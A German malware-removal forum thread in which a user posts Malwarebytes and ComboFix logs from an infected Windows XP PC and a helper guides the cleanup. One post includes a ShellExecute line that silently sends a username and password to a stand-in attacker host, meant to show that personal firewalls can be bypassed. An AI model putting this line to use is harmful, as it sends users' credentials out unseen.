[1998.09.03 08:16:38 | 000,057,240 | ---- | C] () -- C:\WINDOWS\System32\HPFmem15.dll
[1998.09.03 08:16:32 | 000,048,292 | ---- | C] () -- C:\WINDOWS\System32\HPFlpm15.dll
[1998.09.03 08:16:22 | 000,072,368 | ---- | C] () -- C:\WINDOWS\System32\HPFcom15.dll
[1998.09.03 08:15:28 | 000,052,800 | ---- | C] () -- C:\WINDOWS\System32\drivers\hpfecp15.sys
[1998.09.03 08:14:40 | 000,029,184 | ---- | C] () -- C:\WINDOWS\System32\HPFrsu15.dll
[1998.09.03 08:14:08 | 000,117,760 | ---- | C] () -- C:\WINDOWS\System32\HPFrsa15.dll
[1998.09.03 08:09:34 | 001,797,632 | ---- | C] () -- C:\WINDOWS\System32\HPFimg15.dll
[1998.09.03 08:06:08 | 000,124,928 | ---- | C] () -- C:\WINDOWS\System32\HPFcnt15.dll
 
========== Alternate Data Streams ==========
 
@Alternate Data Stream - 487 bytes -> C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\TEMP:05EE1EEF

< End of report >

Beim HijackThis Log interessieren mich zudem einige Einträge (Sony / Apple / Bonjour / FreeDownloadManager) ob ich die Einträge entfernen kann, ohne die Programmfunktionalität zu verhindern. Das sind zum Teil alles Programme, die zwar benutzt werden, aber wenn nur sehr selten.

Ich betreibe keine Online-Banking und Co., möchte zudem den PC ungern neu aufsetzen, da ich im Moment aus diversen Gründen die Neuaufsetzung (inkl. Neubeschaffung der existierenden Software) zeitlich nicht hinkriege. Wichtig wäre es mir nur, dass er "einfach wieder für einige Zeit noch stabil läuft". Später könnte ich ihn dann auch wieder neu aufsetzen. Ich besitze bereits Windows 7, möchte aber aufgrund von Programm-Problemen vorerst nicht umsteigen.

Die letzten beiden Logs sind von Malwarebytes wo entsprechende Dinge gefunden wurden.

Mittels des Autostartmanager finde ich einen laufenden Prozess, der allerdings nicht betitelt ist und wie schon bei einem vorherigen Virus nur mit "..." "..." angegeben ist. Zudem stürzt der Autostartmanager dabei immer ab, seitdem ich versucht habe den Prozess inaktiv zu machen. Stattdessen öffnet sich dann meistens der nächste Prozess, aber seitdem stürzt der Manager wie gesagt ab.

Ich hoffe man kann mir hier weiterhelfen. Eine Neuinstallation ist sicherlich die sinnvollste Lösung. In Anbetracht meiner Umstände ist es aber nicht möglich, daher bitte ich Kommentare dahingehend auszulassen.

Danke im Voraus für jegliche Hilfe.

cosinus · 03.12.2010, 22:45

Die Logs von MBAM bitte vollständig posten!!

Goljef · 05.12.2010, 13:20

Vollständig posten? Ich habe die gespeicherten Logs mit den Fünden genommen und kann nun noch den Log eines Vollständigen Suchlaufes geben, dort wurde allerdings nichts mehr gefunden.

Code:

ATTFilter

Malwarebytes' Anti-Malware 1.50
www.malwarebytes.org

Datenbank Version: 5243

Windows 5.1.2600 Service Pack 3
Internet Explorer 8.0.6001.18702

05.12.2010 12:27:13
mbam-log-2010-12-05 (12-27-13).txt

Art des Suchlaufs: Vollständiger Suchlauf (C:\|E:\|F:\|G:\|)
Durchsuchte Objekte: 409019
Laufzeit: 1 Stunde(n), 33 Minute(n), 36 Sekunde(n)

Infizierte Speicherprozesse: 0
Infizierte Speichermodule: 0
Infizierte Registrierungsschlüssel: 0
Infizierte Registrierungswerte: 0
Infizierte Dateiobjekte der Registrierung: 0
Infizierte Verzeichnisse: 0
Infizierte Dateien: 0

Infizierte Speicherprozesse:
(Keine bösartigen Objekte gefunden)

Infizierte Speichermodule:
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungsschlüssel:
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungswerte:
(Keine bösartigen Objekte gefunden)

Infizierte Dateiobjekte der Registrierung:
(Keine bösartigen Objekte gefunden)

Infizierte Verzeichnisse:
(Keine bösartigen Objekte gefunden)

Infizierte Dateien:
(Keine bösartigen Objekte gefunden)

Hier wird wie man sieht nichts mehr gefunden.

cosinus · 05.12.2010, 15:23

Zitat:

C:\Programme\Zone Labs\ZoneAlarm\zlclient.exe

Umgehend deinstallieren, ZA ist sinnlos bis kontraproduktiv. Sag Bescheid wenn ZA gelöscht wurde. Verwende die Windows-Firewall und nach Möglichkeit einen (DSL-)Router.

Goljef · 05.12.2010, 16:02

Ich habe Zone Alarm, weil es eine Übersicht über ausgehende Programme enthält. Nutze einen Netgear-Router. Dort sollte die Firewall dann auch konfiguriert sein, richtig? Ob sie das ist, muss ich noch überprüfen. Ist eine Deinstallation von ZA in deinen Augen zwingend notwendig bzw. was würdest du dann als Alternativprogramm benennen um ausgehende Verbindungen zu verwalten, weil dies bei der Windows-XP-Firewall soweit ich das gelesen habe, nicht möglich ist.

cosinus · 05.12.2010, 16:14

Zitat:

was würdest du dann als Alternativprogramm benennen um ausgehende Verbindungen zu verwalten

Brauchst du nicht. Ausgehende Verbindungen zu verwalten/kontrollieren ist mehr oder weniger eine Legende. Was raus will, kann ungehindert am Paketfilter vorbei. Als Beispiel:
So einfach ist es, den Paketfilter (aka "Firewall") zu umgehen:

Code:

ATTFilter

ShellExecute(NULL, "open", "http://www.poehseseite.com/?var1=$username&var2=$password", NULL, NULL, SW_HIDE);

Der Standardbrowser ruft dadurch in einem unsichtbaren Fenster eine URL ("pöhseseite") mit sensiblen Daten auf. Hat MS dokumentiert => Use ShellExecute to launch the default Web browser

Zitat:

Ich habe Zone Alarm, weil es eine Übersicht über ausgehende Programme enthält.

Wenn ich mir zB diesen Artikel durchlese, frage ich mich echt ernsthaft, ob man mit einer installierten PFW noch was anderes machen kann, als die PFW mit ihren unverständlichen bis sinnlosen Dialoge durchzulesen und wegzuklicken.

Aber es zwingt dich ja niemand auf die Spielzeug-Firewall zu verzichten

Goljef · 05.12.2010, 20:04

Ich hab schon viel schlechtes über Zone Alarm gelesen, kenne auch wohl die meiste Kritik bzw. habe sie schon bereits gehört. Mir geht es dabei u.a. auch darum Programmen, die ich kenne und die nichts Virus/Trojaner-ähnliches sind, eine Verbindung zu untersagen, weil sie automatisch Dinge tun, die ich nicht möchte. Aus diesem Grund bräuchte ich zumindest Alternativen, die sowas auch können.

Ich habe mir einen fortgeschrittenen Task-Manager besorgt, der zeigt mir weitere Prozesse an. Da war u.a. ein Ordner, der mir schon komisch vor kam.

Einmal: C:\Programme\Free Download Manager\iefdm2.dll
Dann ein versteckter Prozess:
C:\cleanprogx.exe\cleanprogx.exe, der sich als Macromedia Flash Player ausgibt.

Eine Google-Suche hat mich lediglich zu einem HijackThis-Log gebracht eines anderen Problemfalles, sonst hab ich nichts gefunden.

Mein Browser stürzte neuerdings auch bei manchen Videos ab, ob dazu der Flash Player benötigt wurde, weiß ich nicht, der Verdacht liegt nahe.

Da mir bei den erwähnten Dingen nichts angezeigt wird, habe ich sie unberührt gelassen. Sollte ich trotzdem damit etwas tun? Ich würde auch probieren den FDM zu deinstallieren, habe aber Angst, dass wenn sich da was eingenistet hat, das bei der Deinstallation weiterwandert.

cosinus · 06.12.2010, 09:39

Zitat:

weil sie automatisch Dinge tun, die ich nicht möchte.

Wenn du diesen Programmen nicht vertraust, warum sind sie noch installiert?
Dass die PFW diese Programme mit Sicherheit aufhält ist auch nicht gegeben.
Ironischerweise war es vor einiger Zeit ZoneAlarm selbst, das nach Hause telefoniert hat.

Lies nochmal hier, ich denke dann sollte es etwas klarer werden:

Die Vertrauensbrecher c't Editorial über Internet Security Suites und warum sie idR nichts taugen
personal firewalls ? Wiki ? ubuntuusers.de
NT-Dienste sicher konfigurieren und abschalten (Windows 2000/XP) - www.ntsvcfg.de
microsoft.public.de.security.heimanwender FAQ

Malwarebefall vermeiden kannst Du sowieso nur, wenn Du selbst Dein Verhalten in den Griff bekommst => Kompromittierung unvermeidbar?

Goljef · 06.12.2010, 11:19

Ich habe nie gesagt, dass ich den Programmen nicht vertraue. Den Funktionen betreffender Programme vertraue ich u.a. geht es auch um Spiele, bei denen ich nicht durch etwaige Internetprobleme gestört werden will oder mich bei Sachen wie bspw. dem Windows Live-Zeugs automatisch einlogge, wenn ich gerade keine Lust habe, dass Leute sehen, dass ich gerade dies und das mache.

Link 3 + 4 wollen nicht funktionieren.

Jetzt besteht hier eine Diskussion um ein Programm, dessen Funktionsweise ich in Teilen haben möchte und wenn es so "böse" ist, hätte ich gerne ein Alternativprogramm gewusst.

Leider wurde bisher nicht auf das eigentliche bzw. in meinen Augen kritischere Problem eingegangen. Wenn dir oder jemand anderem dazu etwas einfallen würde wäre ich sehr dankbar.

cosinus · 06.12.2010, 12:20

Zitat:

Ich habe nie gesagt, dass ich den Programmen nicht vertraue.

Musst du auch nicht.
Aber dein Vorhaben, ausgehende Verbindungen dieser Programme zu kontrollieren/blockieren, ist doch ein deutlicher Hinweis darauf, dass du diesen Programmen eben nicht (voll) vertraust!
Wenn sie volles Vertrauen genössen, würden ihre Aktivitäten nicht eingeschränkt/blockiert werden oder?

Zitat:

Link 3 + 4 wollen nicht funktionieren.

ntsvcfg funktioniert, aber faq.underflow scheint z.Zt. down zu sein....

Zitat:

Leider wurde bisher nicht auf das eigentliche bzw. in meinen Augen kritischere Problem eingegangen. Wenn dir oder jemand anderem dazu etwas einfallen würde wäre ich sehr dankbar.

Du solltest ZA deinstallieren und dann Bescheid geben, dann gehts weiter, denn ZA kann sehr störend tw. sein. Wie weit ist jetzt der Stand?

Goljef · 06.12.2010, 17:59

Deinstalliert - Windows Firewall aktiviert.

cosinus · 06.12.2010, 19:20

Dann bitte jetzt CF ausführen:

ComboFix

Ein Leitfaden und Tutorium zur Nutzung von ComboFix

Lade dir ComboFix hier herunter auf deinen Desktop. Benenne es beim Runterladen um in cofi.exe.

Dann folgende Anleitung durchlesen und abarbeiten -> CCleaner Systembereinigung

Schliesse alle Programme, vor allem dein Antivirenprogramm und andere Hintergrundwächter sowie deinen Internetbrowser.

Starte cofi.exe von deinem Desktop aus, bestätige die Warnmeldungen, führe die Updates durch (falls vorgeschlagen), installiere die Wiederherstellungskonsole (falls vorgeschlagen) und lass dein System durchsuchen.
Vermeide es auch während Combofix läuft die Maus und Tastatur zu benutzen.

Im Anschluss öffnet sich automatisch eine combofix.txt, diesen Inhalt bitte kopieren ([Strg]a, [Strg]c) und in deinen Beitrag einfügen ([Strg]v). Die Datei findest du außerdem unter: C:\ComboFix.txt.

Wichtiger Hinweis:

Combofix darf ausschließlich ausgeführt werden, wenn ein Kompetenzler dies ausdrücklich empfohlen hat!
Es sollte nie auf eigene Initiative hin ausgeführt werden! Eine falsche Benutzung kann ernsthafte Computerprobleme nach sich ziehen und eine Bereinigung der Infektion noch erschweren.

Goljef · 06.12.2010, 21:19

Jetzt ist wohl was falsch gelaufen, bevor ich jetzt was falsch mache, wollte ich lieber nachfragen.

Ich habe alles wie beschrieben gemacht. Den CCleaner hatte ich sogar schon und auch erst kürzlich verwendet. Naja, jedenfalls ist ComboFix nach der Scan-Stufe 4 hängengeblieben. Es hat sich einfach absolut nichts getan. Dort stand was von 10 Minuten, bei einem schwer infizierten PC von der doppelten Zeit. 25-30 Minuten habe ich gewartet und dann den Task-Manager aufgemacht und versucht den Prozess zu beenden, den ich ausgemacht hatte als ComboFix. Es waren mehrere zu finden, die aber allesamt nichts gemacht haben. Daher hab ich einen der Prozesse beendet und darauf lief es plötzlich weiter bis zur Stufe 50 etwa, worauf mind. zwei Sachen gelöscht wurden, die ich in msconfig gesehen hatte und mir ebenfalls seltsam vorkamen.

Neustart wurde durchgeführt, allerdings trat dabei schon ein Fehler auf, der die gleiche Bezeichnung hatte wie der Prozess, den ich beendet hatte. Nach dem Neustart wurde Antivir, MBytes und Co wieder geladen, ich sollte keine Sachen starten und warten. Habe ich gemacht, bis sich wieder überhaupt nichts getan hat nach etwa 20 Minuten. Dann habe ich erst überlegt, ob Antivir oder ähnliches es blockieren könnte, habe die Sachen beendet und als sich dann immer noch nichts getan hat erst einen, dann einen weiteren Prozess. Dann ists ausgegangen, ohne den Log. Unter C befindet sich lediglich der Ordner cofi.exe.

Da ich wegen des ständigen Aufbaus zu der im Startpost genannten IP-Adresse ungern ohne Mbytes-Schutz im Internet bin, hatte ich auch, wenn nicht nötig die Verbindung zum Internet gezogen.

Der verdächtige Prozess läuft jedenfalls weiterhin. Log ist wegen der Beendigung auch nicht da.

1. Nochmal durchführen und einfach warten?
2. Internetverbindung anlassen? (es stand nirgends was von einer benötigten Verbindung, daher hab ich darauf geschlossen, dass keine benötigt wird (sofern er nicht explizit gefragt hatte))

cosinus · 06.12.2010, 21:56

Ja bitte nochmal ausführen. Cofi braucht beim ersten Lauf immer eine Internetverbindungen für evtl Updates und die Dateien der WHK, also Internet nicht trennen.

Goljef · 07.12.2010, 11:56

Zu Anfang hatte ich die Verbindung gezogen, dann fragte er wegen der Wiederherstellungskonsole, da hatte ich die Verbindung dann hergestellt und nach Installation wieder gezogen.

Jedenfalls habe ich diesmal alles gelassen - gleiches Problem. Nach Stufe 4 tut er nichts mehr, es sei denn ich beende einen der Prozesse.
edit: Diesmal hab ich auch locker mindestens eine Stunde gewartet.

Glücklicherweise hat er nach dem Neustart dann doch das Textfile erstellt. Beim ersten Mal stand dort allerdings nichts von einem Problem, dass nicht genügend Hauptspeicher vorhanden sei, soweit ich mich jedenfalls erinnere.

Nun gut:

Code:

ATTFilter

ComboFix 10-12-06.03 - Stephan 07.12.2010  10:19:08.2.4 - x86
Microsoft Windows XP Home Edition  5.1.2600.3.1252.49.1031.18.3326.2717 [GMT 1:00]
ausgeführt von:: c:\dokumente und einstellungen\Stephan\Desktop\cofi.exe.exe
AV: AntiVir Desktop *On-access scanning disabled* (Updated) {AD166499-45F9-482A-A743-FDD3350758C7}
.
	/wow section - STAGE 4

	/wow section - STAGE 8
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.

	/wow section - STAGE 10

	/wow section - STAGE 17
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.
Das System kann den angegebenen Pfad nicht finden.
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.

	/wow section - STAGE 23
Nicht gengend Hauptspeicher zur Fertigstellung des Sortiervorgangs.

SED: can't read temp2201: No such file or directory
SED: can't read temp2201: No such file or directory
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.

	/wow section - STAGE 32
Nicht gengend Hauptspeicher zur Fertigstellung des Sortiervorgangs.

SED: can't read temp2402: No such file or directory
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.
Nicht gengend Hauptspeicher zur Fertigstellung des Sortiervorgangs.

SED: can't read temp3106: No such file or directory
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.

	/wow section - STAGE 32A
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.

	/wow section - STAGE 33
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.

	/wow section - STAGE 34
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.
Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird.


((((((((((((((((((((((((((((((((((((   Weitere Löschungen   ))))))))))))))))))))))))))))))))))))))))))))))))
.
.
---- Vorheriger Suchlauf -------
.
c:\dokumente und einstellungen\All Users\Anwendungsdaten\Microsoft\Network\Downloader\qmgr0.dat
c:\dokumente und einstellungen\All Users\Anwendungsdaten\Microsoft\Network\Downloader\qmgr1.dat
C:\Install.exe
c:\windows\regedit.com
c:\windows\system32\taskmgr.com

.
(((((((((((((((((((((((   Dateien erstellt von 2010-11-07 bis 2010-12-07  ))))))))))))))))))))))))))))))
.

2010-12-05 18:38 . 2010-12-05 18:50	--------	d-----w-	c:\dokumente und einstellungen\All Users\Anwendungsdaten\SecTaskMan
2010-12-05 18:38 . 2010-12-05 18:38	--------	d-----w-	c:\programme\Security Task Manager
2010-12-03 14:29 . 2010-12-03 14:29	388096	----a-r-	c:\dokumente und einstellungen\Stephan\Anwendungsdaten\Microsoft\Installer\{45A66726-69BC-466B-A7A4-12FCBA4883D7}\HiJackThis.exe
2010-12-03 13:15 . 2010-12-03 13:15	--------	d-----w-	c:\dokumente und einstellungen\Administrator\Anwendungsdaten\Avira
2010-12-02 14:18 . 2010-12-02 14:18	--------	d---a-w-	c:\windows\VDLL.DLL
2010-12-02 14:18 . 2010-12-02 14:18	--------	d---a-w-	c:\windows\system32\runouce.exe
2010-12-02 14:18 . 2010-12-02 14:18	--------	d---a-w-	c:\windows\RUNDL132.EXE
2010-12-02 14:18 . 2010-12-02 14:18	--------	d---a-w-	c:\windows\logo_1.exe
2010-12-02 14:13 . 2010-12-02 14:13	632064	----a-w-	c:\windows\system32\msvcr80.dll
2010-12-02 14:13 . 2010-12-02 14:13	554240	----a-w-	c:\windows\system32\msvcp80.dll
2010-12-02 14:13 . 2010-12-02 14:13	34048	----a-w-	c:\windows\system32\eEmpty.exe
2010-12-02 14:13 . 2008-04-14 02:23	140800	----a-w-	c:\windows\system32\T.COM
2010-12-02 14:13 . 2008-04-14 02:22	153600	----a-w-	c:\windows\R.COM
2010-12-02 14:13 . 2010-12-02 14:13	--------	d-----w-	c:\programme\Gemeinsame Dateien\MicroWorld
2010-12-02 14:13 . 2010-12-02 14:13	--------	d-----w-	c:\dokumente und einstellungen\All Users\Anwendungsdaten\MicroWorld
2010-12-02 13:59 . 2010-12-02 14:08	--------	d-----w-	c:\dokumente und einstellungen\Stephan\Anwendungsdaten\Download Manager
2010-12-01 21:08 . 2010-09-15 03:50	472808	----a-w-	c:\programme\Mozilla Firefox\plugins\npdeployJava1.dll
2010-12-01 21:08 . 2010-09-15 03:50	472808	----a-w-	c:\windows\system32\deployJava1.dll
2010-12-01 19:40 . 2010-12-01 19:40	--------	d-----w-	C:\spoolerlogs

.
((((((((((((((((((((((((((((((((((((   Find3M Bericht   ))))))))))))))))))))))))))))))))))))))))))))))))))))))
.
.

((((((((((((((((((((((((((((   Autostartpunkte der Registrierung   ))))))))))))))))))))))))))))))))))))))))
.
.
*Hinweis* leere Einträge & legitime Standardeinträge werden nicht angezeigt. 
REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"? "="" [?]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WheelMouse"="c:\programme\OCZ Technology\Mouse\Amoumain.exe" [2006-12-28 196608]
"{0228e555-4f9c-4e35-a3ec-b109a192b4c2}"="c:\programme\Gmail Notifier\gnotify.exe" [2005-07-15 479232]
"RTHDCPL"="RTHDCPL.EXE" [2008-05-16 16862720]
"avgnt"="c:\programme\Avira\AntiVir Desktop\avgnt.exe" [2010-11-05 281768]
"NvMediaCenter"="c:\windows\system32\NvMcTray.dll" [2009-11-20 110184]
"NvCplDaemon"="c:\windows\system32\NvCpl.dll" [2009-11-20 12669544]
"Adobe ARM"="c:\programme\Gemeinsame Dateien\Adobe\ARM\1.0\AdobeARM.exe" [2010-09-21 932288]
"Adobe Reader Speed Launcher"="c:\programme\Adobe\Reader 8.0\Reader\Reader_sl.exe" [2010-09-24 40368]
"SunJavaUpdateSched"="c:\programme\Gemeinsame Dateien\Java\Java Update\jusched.exe" [2010-05-14 248552]
"Malwarebytes' Anti-Malware"="c:\programme\Malwarebytes' Anti-Malware\mbamgui.exe" [2010-11-29 443728]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="c:\windows\System32\CTFMON.EXE" [2008-04-14 15360]
"CTFMON.EXE"="c:\windows\System32\CTFMON.EXE" [2008-04-14 15360]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys]
@="Driver"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WudfSvc]
@="Service"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\                                         ]
REM

Ich habe kurz drübergeschaut und lese etwas von AntiVir. Liegt es mglw. daran? Ich habe den Guard deaktiviert gehabt.

03.12.2010, 22:45	#2
cosinus /// Winkelfunktion /// TB-Süch-Tiger™	Trojaner/Virus wird nicht erkannt Die Logs von MBAM bitte vollständig posten!! __________________ __________________

06.12.2010, 21:56	#14
cosinus /// Winkelfunktion /// TB-Süch-Tiger™	Trojaner/Virus wird nicht erkannt Ja bitte nochmal ausführen. Cofi braucht beim ersten Lauf immer eine Internetverbindungen für evtl Updates und die Dateien der WHK, also Internet nicht trennen. __________________ Logfiles bitte immer in CODE-Tags posten

Trojaner/Virus wird nicht erkannt

Log-Analyse und Auswertung: Trojaner/Virus wird nicht erkannt